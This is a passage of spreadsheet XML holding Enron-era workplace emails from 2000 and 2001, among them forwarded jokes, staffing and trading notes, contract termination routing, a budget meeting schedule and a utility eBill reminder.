</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 02:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tarm27@texas.net'})</t>
  </si>
  <si>
    <t>FW: Can you help my buddy, he's looking to get on a deer lease AS_x000D_
 AP</t>
  </si>
  <si>
    <t xml:space="preserve">I found this picture of you shooting a shotgun, you crazy man._x000D_
PL_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 10/11/2000 _x000D_
09:28 AM ---------------------------_x000D_
   _x000D_
	Enron Global Finance_x000D_
	_x000D_
	From:  Jimmy Simien @ ENRON                           10/11/2000 09:17 AM_x000D_
	_x000D_
_x000D_
To: Kevin Bosse/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: Can you help my buddy, he's looking to get on a deer lease AS AP_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jimmy Simien/Corp/Enron on 10/11/2000 _x000D_
09:17 AM ---------------------------_x000D_
_x000D_
_x000D_
David Mitchell@ECT_x000D_
10/10/2000 04:53 PM_x000D_
To: Jimmy Simien/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Can you help my buddy, he's looking to get on a deer lease AS AP_x000D_
_x000D_
_x000D_
---------------------- Forwarded by David Mitchell/HOU/ECT on 10/10/2000 _x000D_
04:52 PM ---------------------------_x000D_
_x000D_
_x000D_
"Swanson, Douglas" &lt;Douglas.Swanson@EPEnergy.com&gt; on 10/10/2000 04:44:12 PM_x000D_
To: "'David Mitchell'" &lt;David.Mitchell@enron.com&gt;_x000D_
cc:  _x000D_
Subject: FW: Can you help my buddy, he's looking to get on a deer lease AS AP_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Bechtol, Brent_x000D_
&gt; Sent: Tuesday, October 10, 2000 4:41 PM_x000D_
&gt; To: Swanson, Douglas_x000D_
&gt; Subject: FW: Can you help my buddy, he's looking to get on a deer_x000D_
&gt; lease ASAP_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Carter Bechtol [mailto:carter@cyberpix.com]_x000D_
&gt; Sent: Tuesday, October 10, 2000 4:44 PM_x000D_
&gt; To: Bechtol, Brent; Currie Bechtol_x000D_
&gt; Subject: FW: Can you help my buddy, he's looking to get on a deer lease_x000D_
&gt; ASAP_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Jason Fertitta [mailto:jfertitta@cyberpix.com]_x000D_
&gt; Sent: Tuesday, October 10, 2000 3:32 PM_x000D_
&gt; To: Carter Bechtol_x000D_
&gt; Subject: FW: Can you help my buddy, he's looking to get on a deer lease_x000D_
&gt; ASAP_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Bryan.McMurrey@texas.net [mailto:Bryan.McMurrey@texas.net]_x000D_
&gt; Sent: Wednesday, October 11, 2000 4:58 PM_x000D_
&gt; To: Jason Fertitta; 'mullins'; Palmer Letzerich; Kyle F; Robert dawson_x000D_
&gt; Subject: Fw: Can you help my buddy, he's looking to get on a deer lease_x000D_
&gt; ASAP_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Sorry about the long download. I feel like this is worth it._x000D_
&gt;  &lt;&lt;AHMED_Shoots.mpeg&gt;&gt;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_x000D_
_x000D_
 - AHMED_Shoots.mpeg_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Jun 2001 01:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: bio</t>
  </si>
  <si>
    <t>Will this comply with your request?</t>
  </si>
  <si>
    <t>Fri, 10 Aug 2001 08:36:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>Glenn Surowiec</t>
  </si>
  <si>
    <t>_x000D_
I regret to inform you that Glenn Surowiec has decided to leave Enron to pursue other career opportunities.  Glenn has been a welcome addition to the West Power Structuring Desk and his presence and contribution will be missed.  Please join me in wishing Glenn the best of luck in his future career._x000D_
_x000D_
Todd A. Perry_x000D_
Enron North America	503.464.3729 (work)_x000D_
121 SW Salmon Street	503.807.6106 (cell)_x000D_
3WTC, 0306		503.464.3740 (fax)_x000D_
Portland, OR 97204		todd.perry@enron.com</t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 13:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>IMPositions, TXT and Official!</t>
  </si>
  <si>
    <t>Hi Robin,_x000D_
_x000D_
Attached is the IMPositions TXT file. Here are the following post ID's for _x000D_
the official books as well._x000D_
_x000D_
IM Cand West Financial  827908_x000D_
IM Cand West Physical   827931_x000D_
IM Cand West Gas Daily 827935_x000D_
_x000D_
IM BC Physical 827936_x000D_
IM BC Financial  827912_x000D_
IM BC Gas Daily 827937_x000D_
_x000D_
Geri's Book 827921_x000D_
Options Gas Daily 827926_x000D_
_x000D_
_x000D_
_x000D_
Have a good night,_x000D_
Brian</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 04:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jenders@ap.org'})</t>
  </si>
  <si>
    <t>Re: a beer</t>
  </si>
  <si>
    <t xml:space="preserve">So sorry for not getting back to you sooner - it seems I've acquired two new _x000D_
jobs in addition to the full time schedule I already kept. But tonight still _x000D_
works for me - just let me know when and where._x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Enders &lt;jenders@ap.org&gt; on 04/25/2001 10:28:41 AM_x000D_
To: Kate.Symes@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Re: a beer_x000D_
_x000D_
_x000D_
Are we on, or off?_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 09:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'fred.kelly@enron.com'})</t>
  </si>
  <si>
    <t>Re: Siemens Westinghouse Points of Contractor- Generator Inspection</t>
  </si>
  <si>
    <t>Ben - although my role is changing inside Enron, you know I will always help _x000D_
you as requested/required.  I am discussing this particular situation with _x000D_
Keith Dodson inside the newly formed EEAS  - we will call you to discuss.  _x000D_
_x000D_
Things I think/recommend should happen regardless:_x000D_
_x000D_
1)  Your idea of a coordination meeting is good.  The combined efforts of our _x000D_
teams....., taking 7 months to get the generator uncrated and inspected..., _x000D_
is not spectacular.  _x000D_
_x000D_
2)  I think that ........, in the right way........, we need to insure that _x000D_
if anyone asks Janet Dietrich or Delainey whether we were impeded on the _x000D_
Electrocities project, and......, whether we would really be willing to _x000D_
litigate a claim based on that..... I want to make sure our answer doesn't _x000D_
change.  Don't take that the wrong way, but......, I believe there are people _x000D_
inside ENA and the old EECC that have rolled their eyes in front of _x000D_
Westinghouse regarding our claim for LD's.  I don't think we have _x000D_
Westinghouse believing we were impeded (because the Enron team isn't _x000D_
convinced).  Westinghouse's cooperation might be different if they sincerely _x000D_
believed that Enron was "impeded".  Kay Mann's input that Enron was really _x000D_
impeded weighs strong on my mind (I put a lot of weight in Kay's opinions).  _x000D_
If you could get that clarified/reinforced/defined at that level......, we _x000D_
can insure we are on solid ground in talking w/ Westinghouse.  Kay makes a _x000D_
good point that it doesn't matter what "...the team believes....".  I _x000D_
politely disagree and feel that if we convinced ourselves......., _x000D_
Westinghouse's cooperation might change.  _x000D_
_x000D_
3)  I think that Kay (and John Schwartzenburg's team if Kay desires) should _x000D_
advise if any official notifications should be made to Westinghouse (e.g., we _x000D_
haven't really ever formally "rejected" delivery.... maybe we want to rely on _x000D_
the correspondance that has evolved, and...... a new letter now would weaken _x000D_
our case..... but....., I believe you would want Kay (and maybe John if Kay _x000D_
desires) to advise if any such notification could strengthen our position.  )_x000D_
_x000D_
Keith and I will call.    _x000D_
_x000D_
Fred Kelly_x000D_
_x000D_
Phone     713-646-6207_x000D_
Mobile     713-851-9172</t>
  </si>
  <si>
    <t>Mon, 11 Jun 2001 20:11:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>Interview Cheryl Lindeman (A candidate for a spot in Julia Murray's_x000D_
 Group)</t>
  </si>
  <si>
    <t>Jennifer Whitney - 54171</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 05:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Chart of Lavorato Analysts</t>
  </si>
  <si>
    <t xml:space="preserve">Dave _x000D_
_x000D_
Can you get one of your people to handle this._x000D_
_x000D_
Lavo_x000D_
---------------------- Forwarded by John J Lavorato/Corp/Enron on 07/13/2000 _x000D_
12:48 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Jana Giovannini @ ECT                           07/13/2000 11:10 AM_x000D_
	_x000D_
_x000D_
To: John J Lavorato/Corp/Enron@Enron_x000D_
cc: Elizabeth Boudreaux/HOU/ECT@ECT _x000D_
_x000D_
Subject: Chart of Lavorato Analysts_x000D_
_x000D_
John,_x000D_
I am the ENA Staffing Coordinator for the Associate and Analyst Program.  _x000D_
Attached is a list of incoming Analyst that will begin next Monday and are _x000D_
scheduled to go into the Trading organization per a resume review you had _x000D_
done .  We are trying to identify exactly who these people will need to _x000D_
report too in order to communicate to the Analyst and to also update our _x000D_
database with correct rotation information.  We would like to tell the _x000D_
Analyst exactly where they would go by Monday 17th.  Can you please advise me _x000D_
on who I need to contact in the Trading orgainzation in order to get these _x000D_
final placements made?  _x000D_
_x000D_
Thank you,_x000D_
Jana _x000D_
---------------------- Forwarded by Jana Giovannini/HOU/ECT on 07/13/2000 _x000D_
09:59 AM ---------------------------_x000D_
_x000D_
_x000D_
	Angela Matheson @ ENRON_x000D_
	07/13/2000 09:52 AM_x000D_
	_x000D_
To: Jana Giovannini/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Chart of Lavorato Analysts_x000D_
_x000D_
Here is a chart of the "Per John Lavorato" people._x000D_
_x000D_
  _x000D_
  _x000D_
  _x000D_
  _x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 04:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'linda.simmons@enron.com', 'linda.noske@enron.com', 'richard.sanders@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'mark.taylor@enron.com', 'jenny.helton@enron.com', 'mark.greenberg@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'mark.powell@enron.com', 'james.grace@enron.com', 'jane.mcbride@enron.com', 'janette.elbertson@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'samantha.boyd@enron.com', 'andrea.calo@enron.com', 'mary.cook@enron.com', 'lance.schuler-legal@enron.com', 'becky.tlucek@enron.com', 'sandi.braband@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', "denis.o'connell@enron.com", 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'peter.keohane@enron.com', 'sheila.tweed@enron.com', 'chaundra.woods@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'mark.haedicke@enron.com', 'mark.elliott@enron.com', 'dan.hyvl@enron.com', 'chris.gaffney@enron.com', 'pat.radford@enron.com', 'greg.johnston@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'gloria.cruz@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'mark.evans@enron.com', 'christian.yoder@enron.com', 'matthias.lee@enron.com', 'jeffrey.hodge@enron.com', 'peggy.banczak@enron.com', 'anne.koehler@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'angela.davis@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'susan.flynn@enron.com', 'robert.quick@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'peter.vecchio@enron.com', 'robert.george@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'joya.davis@enron.com', 'travis.mccullough@enron.com', 'karen.jones@enron.com', 'brenda.whitehead@enron.com', 'brent.hendry@enron.com', 'martin.penkwitz@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'dale.rasmussen@enron.com', 'ann.white@enron.com', 'roger.balog@enron.com', 'teresa.bushman@enron.com', 'elizabeth.sager@enron.com', 'alan.larsen@enron.com', 'john.viverito@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'dina.snow@enron.com', 'robert.bruce@enron.com'})</t>
  </si>
  <si>
    <t>LEGAL CONFERENCE - SHIRT SIZE......MORE INFORMATION</t>
  </si>
  <si>
    <t>TO ANSWER ALOT OF YOUR QUESTIONS AS TO WHAT TYPE OF SHIRT WE ARE ORDERING SO _x000D_
YOU CAN GIVE US THE CORRECT SIZE, IT WILL BE LOOSE FITTING LIKE THE HAWAIIAN _x000D_
SHIRTS.  IF YOU ALREADY RESPONDED YESTERDAY AND/OR TODAY AND FEEL YOU NEED TO _x000D_
CHANGE THE SIZE, PLEASE DO SO AND FORWARD VIA E-MAIL TO CAROLYN GEORGE.  SHE _x000D_
WILL BE COORDINATING THE SHIRT SIZING FOR THE CONFERENCE._x000D_
_x000D_
THANKS, SORRY I COULDN'T PROVIDE YOU WITH THIS INFORMATION EARLIER.</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 01:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: PPL</t>
  </si>
  <si>
    <t>yes_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 12:47:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'a..campos@enron.com'})</t>
  </si>
  <si>
    <t>RE: CGLF contract</t>
  </si>
  <si>
    <t>How are you doing Chris?  I've been away for awhile....just wanted to let you know that I'm working on it._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Germany, Chris  _x000D_
Sent:	Monday, November 19, 2001 12:36 PM_x000D_
To:	Campos, Sylvia A._x000D_
Subject:	RE: CGLF contract_x000D_
_x000D_
And, because I waited so long, it should be done in a great big hurry!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hilliard, Marlene  _x000D_
Sent:	Friday, November 16, 2001 3:05 PM_x000D_
To:	Campos, Sylvia A._x000D_
Cc:	Germany, Chris; Nemec, Gerald_x000D_
Subject:	FW: CGLF contract_x000D_
_x000D_
_x000D_
_x000D_
Attached is a copy of a termination letter.  Per the terms of the contract, notice of termination should be 6 months prior to termination.  Chris Germany has requested that this contract be terminated. _x000D_
_x000D_
_x000D_
The termination letter should be routed to Gerald Nemec for review and redlining.  Then, routed for review and initial  to the Trader, Chris Germany, to Legal - Gerald Nemec, and then to the Vice President - Scott Neal.  Contact Scott Neal through Kimberly Bates_x000D_
_x000D_
_x000D_
 &lt;&lt; File: CGLF Termination Letter#37393.doc &gt;&gt; _x000D_
_x000D_
-----Original Message-----_x000D_
From: 	Germany, Chris  _x000D_
Sent:	Friday, November 16, 2001 2:15 PM_x000D_
To:	Hilliard, Marlene_x000D_
Subject:	FW: CGLF contract_x000D_
_x000D_
_x000D_
_x000D_
Our contact for this is Janice Felton.  Her number is 713-267-4210.  Please call her on Monday and let her know that ENA wishes to terminate contract 37393 effective 5/31/2002.  Ask her what she needs in writing from us then draft it and send it to her attentions._x000D_
_x000D_
Thanks_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Germany, Chris  _x000D_
Sent:	Tuesday, October 23, 2001 1:35 PM_x000D_
To:	Hilliard, Marlene_x000D_
Subject:	RE: CGLF contract_x000D_
_x000D_
I believe its Janice Felton but I will make sure._x000D_
_x000D_
Thanks_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hilliard, Marlene  _x000D_
Sent:	Tuesday, October 23, 2001 12:44 PM_x000D_
To:	Germany, Chris_x000D_
Subject:	FW: CGLF contract_x000D_
_x000D_
Yes Chris I can draft a termination letter.  The termination notice period is 6 months prior  written notice to either party._x000D_
_x000D_
_x000D_
Let me know who it should be addressed to and I will draft the letter and forward it prior to December 1, 2001 which will give the counterparty 6 month prior written notice.  I will have to have it executed by the proper parties of course._x000D_
_x000D_
_x000D_
I will wait to hear from you. _x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Germany, Chris  _x000D_
Sent:	Tuesday, October 23, 2001 12:31 PM_x000D_
To:	Ramirez, Robert_x000D_
Cc:	Fletcher, Brenda H.; Hilliard, Marlene_x000D_
Subject:	CGLF contract_x000D_
_x000D_
Robert, when you get a chance, please give me all the service deal numbers for CGLF k#37393._x000D_
_x000D_
Marlene, the new termination date for this contract is 5/31/2002.  If I have time, I am going to send CGLF a termination notice for this contract effective 5/31/2002.  Is that something you could do for me?_x000D_
_x000D_
Let me know.</t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 02:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.ruane@enron.com'})</t>
  </si>
  <si>
    <t>DASH for Harvard</t>
  </si>
  <si>
    <t xml:space="preserve">What do you think. Probably ok I guess. Rick_x000D_
---------------------- Forwarded by Rick Buy/HOU/ECT on 02/12/2001 10:36 AM _x000D_
---------------------------_x000D_
From: Michael B Rosen on 02/12/2001 09:11 AM_x000D_
To: Rick Buy/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: DASH for Harvard_x000D_
_x000D_
Rick-  _x000D_
_x000D_
Thanks for the DASH for the Harvard case study. _x000D_
_x000D_
I know that you changed the name and some numbers, but I just wanted to check _x000D_
that you are comfortable with it being included as an example in a study that _x000D_
will be published and taught._x000D_
_x000D_
Please confirm._x000D_
_x000D_
Thanks. _x000D_
_x000D_
Mike_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 10:03:37 -0800 (PST)</t>
  </si>
  <si>
    <t>like me_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 12:02 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
oh this little man that sits next to me is so nice!</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 08:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ken.shulklapper@enron.com'})</t>
  </si>
  <si>
    <t>Re: FW: FW: For all of the Austin Power fans out there!!</t>
  </si>
  <si>
    <t>they have to be worried about you in ebs if you come in to work hung over on _x000D_
mondays</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 05:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kevin.bosse@enron.com'})</t>
  </si>
  <si>
    <t>Re: Fw: Texas</t>
  </si>
  <si>
    <t>I was going to forward the same thing to you yesterday, but didn't want you _x000D_
to think I was an asshole!!_x000D_
_x000D_
DG    3-9573</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 05:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: 4/27 Checkout</t>
  </si>
  <si>
    <t xml:space="preserve">595043 - CHANGED TO WILLIAMS/ADDED 15.00 FLAT BROKER FEE_x000D_
595042 - CHANGED TO TUSCON_x000D_
_x000D_
Other deals are just being entered now._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
04/27/2001 12:37 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 4/27 Checkout_x000D_
_x000D_
 _x000D_
_x000D_
BLOOMBERG_x000D_
_x000D_
Mark Fischer_x000D_
deal 595043_x000D_
Should the cp be Williams because Bloomberg shows a deal identical to this _x000D_
however, the cp is Williams and we do not have a deal for Williams like this _x000D_
deal._x000D_
_x000D_
_x000D_
_x000D_
PREBON WEST_x000D_
_x000D_
I am missing_x000D_
_x000D_
Mike Swerzbin:_x000D_
Buys Duke Q2'02 SP-15 at $102 peak hrs_x000D_
_x000D_
Tom Alons:_x000D_
buys Aquila May Palo Verde  at $315_x000D_
_x000D_
_x000D_
_x000D_
AMEREX WEST_x000D_
I am missing:_x000D_
_x000D_
MIke Swerzbin:_x000D_
1) Enron buys BP 25mw June Palo at $415_x000D_
2) Enron buys Duke 25 mw Q4'02 COB $105_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Jun 2000 01:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brent.price@enron.com'})</t>
  </si>
  <si>
    <t>Re: LNG</t>
  </si>
  <si>
    <t xml:space="preserve">I left a voice mail message for Dave Delainey this morning asking for _x000D_
clarification around the LNG business.  As soon as I hear back from him I _x000D_
will let you know, and then based on that info we can decide on best next _x000D_
steps.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Brent A Price_x000D_
06/05/2000 09:18 PM_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: LNG _x000D_
  _x000D_
_x000D_
The only conversation I have had with Jeff regarding this topic was when I _x000D_
was in Houston and he had inquired as to when I was returning, stating that _x000D_
he was going to need some help in integrating another business within Gas _x000D_
Trading (and alluded to the possibility of it being Liquids related).  My _x000D_
thoughts are that it would need to be supported out of my group since it is _x000D_
going to roll up to Jeff.  Do you want me to set up a conference call with _x000D_
you, Scott Earnest and myself to discuss?  Subsequent to that we should _x000D_
probably have a conference call with Jeff to get specifics.  Let me know what _x000D_
I need to do on this._x000D_
_x000D_
Brent_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sally Beck                           06/05/2000 11:58 PM_x000D_
	_x000D_
_x000D_
To: Brent A Price/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: LNG _x000D_
_x000D_
_x000D_
Scott Earnest announced in the staff meeting today that in a meeting he had _x000D_
earlier today with Jeff Shankman and Vince Kaminiski that Jeff announced that _x000D_
he had gotten the nod from Mark Frevert to manage the LNG book of business.  _x000D_
(This sentence structure is bad, but you get the drift.)  That is probably _x000D_
what Shankman has alluded to in terms of increased responsibility.  I will _x000D_
assume that is in addition to gas, but I don't know that for sure.  _x000D_
_x000D_
Scott has been working on setting up the risk books for LNG, working closely _x000D_
over the last several weeks with Vince Kaminski.  We need to talk about this _x000D_
business and the best way to support it.  Have you had any conversations with _x000D_
Jeff on this?   _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Sep 2001 12:02:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Budget mtg - Ken Lay  (mg/Sharron x37094)</t>
  </si>
  <si>
    <t>From: Rick Causey_x000D_
_x000D_
	WE HAVE RESCHEDULED THE BUDGET MEETINGS AS FOLLOWS:_x000D_
_x000D_
	 FRIDAY, SEPTEMBER 14, 2001_x000D_
		   10:00 - 1:00_x000D_
 		EB50M DINING._x000D_
_x000D_
	ATTENDEES:_x000D_
			KEN LAY_x000D_
			GREG WHALLEY_x000D_
			MARK FREVERT_x000D_
			RICK CAUSEY_x000D_
			BOB BUTTS_x000D_
			MARK LINDSEY _x000D_
			AND AS FOLLOWS _x000D_
	_x000D_
	10:00 - 10:15	OVERVIEW-RICK CAUSEY_x000D_
_x000D_
	10:15 - 11:00	STEVE KEAN_x000D_
_x000D_
	11:00 - 11:15	RICK BUY_x000D_
_x000D_
	11:15 - 11:30	ANDY FASTOW_x000D_
_x000D_
	11:30 - 11:45	JIM DERRICK - ROB WALLS_x000D_
_x000D_
	11:45 - 12:00	MARK KOENIG_x000D_
	_x000D_
	12:00 - 12:15	BILLY LEMMONS_x000D_
_x000D_
	12:15 - 1:00	RICK CAUSEY_x000D_
_x000D_
Please call me at X37094 if you have any questions.</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 13:20:08 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'foster.smith@elpaso.com'})</t>
  </si>
  <si>
    <t>You want to get a quick drink around 4:30?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Sat, 5 May 2001 02:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'reliantenergy@ebillcare.com'})</t>
  </si>
  <si>
    <t>Reliant Energy eBill Statement</t>
  </si>
  <si>
    <t>Dear September Vincent,_x000D_
_x000D_
Just a reminder that your current Reliant Energy HL&amp;P statement is ready_x000D_
for you to review at https://ebill.reliantenergy.com/logon/  If you_x000D_
participate in the Automatic Payment Plan (APP), your bank account will be_x000D_
automatically drafted for the amount due.  Remember, with Auto Pay no_x000D_
action is required to ensure your bill gets paid._x000D_
If you do not participate in Automatic Payment Plan (APP), you can pay_x000D_
your bill immediately or schedule payment for a later date.  As with paper_x000D_
bills your payment is due about 2 weeks from the statement date. The_x000D_
online bill replaces your paper bill, a paper copy of your bill will not_x000D_
be sent._x000D_
_x000D_
Should you need to modify your account information, go to_x000D_
https://ebill.reliantenergy.com/logon/  log into eBill and select User_x000D_
Information. There you can update your information such as your email_x000D_
address, change your password and add accounts._x000D_
_x000D_
As you use our eBill service, please do not hesitate to provide comments_x000D_
through the Contact Us section of the site. Check out the Frequently Asked_x000D_
Questions section for a quick reference._x000D_
_x000D_
Again, thank you for choosing Reliant Energy=01,s eBill service._x000D_
_x000D_
Reliant Energy eBill Customer Care_x000D_
http://www.reliantenergy.com/_x000D_
______________________________x000D_
_x000D_
In an effort to enhance the security of your eBill transactions, Reliant_x000D_
Energy is upgrading its systems to offer the highest level of protection_x000D_
possible for all your financial transactions: 128-bit data encryption. To_x000D_
take advantage of this improved security, beginning in June, all eBill_x000D_
users must use an internet browser capable of supporting 128-bit_x000D_
encryption technology. The latest browsers from Microsoft and Netscape_x000D_
meet this standard and are available for free download using the links_x000D_
below._x000D_
_x000D_
We apologize for any inconvenience, and we appreciate your support as we_x000D_
work to improve the quality and security of our eBill service.  If you_x000D_
have already upgraded, please disregard this message.  If you have not_x000D_
already upgraded, please do so prior to June._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Wes Hill,_x000D_
Reliant Energy eBill Team_x000D_
_x000D_
Microsoft=01,s Internet Explorer:_x000D_
http://www.microsoft.com/windows/ie/download/128bit/intro.htm_x000D_
_x000D_
Netscape:_x000D_
http://home.netscape.com/download/index.html</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 01:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'russell.ballato@enron.com', 'larry.jester@enron.com', 'larry.campbell@enron.com', 'miguel.garcia@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'jay.wills@enron.com', 'joe.errigo@enron.com', 'rudy.acevedo@enron.com', 'wayne.herndon@enron.com', 'lawrence.clayton@enron.com', 'chad.starnes@enron.com', 'juan.hernandez@enron.com', 'kayne.coulter@enron.com', 'keller.mayeaux@enron.com', 'joe.stepenovitch@enron.com', 'cyril.price@enron.com', 'jason.choate@enron.com'})</t>
  </si>
  <si>
    <t>Election Humor</t>
  </si>
  <si>
    <t xml:space="preserve">Have fun.... and a safe Thanksgiving..... Richard_x000D_
_x000D_
_____________________________________________________________________x000D_
_x000D_
_x000D_
_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? Bill Clinton, Al Gore and George W.  Bush died and found_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? themselves standing on the other side  of the Jordan River,_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? looking across at the Promised  Land._x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? The Archangel Michael was standing on  the other side and_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? shouted? over to the three  surprised Americans, "Contrary_x000D_
to_x000D_
&gt; &gt; &gt;what_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; you_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? have? been taught, each of you  will have to wade across_x000D_
the_x000D_
&gt; &gt; &gt;Jordan_x000D_
&gt; &gt; &gt; &gt;  &gt; &gt;?????? River."_x000D_
&gt; &gt; &gt; &gt;  &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;??????  As Michael saw their perplexed looks, he reassured them by_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt;?????? saying, "Don't worry.?  You will sink only proportionally_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? according to your sins on earth.?  The more you have sinned_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? the more you will sink into the  water."_x000D_
&gt; &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? The three American sages of political  lore looked at one_x000D_
&gt; &gt; &gt; &gt; &gt;  &gt;?????? another,? trying to determine who  shall be the first brave_x000D_
&gt; soul_x000D_
&gt; &gt; &gt;to_x000D_
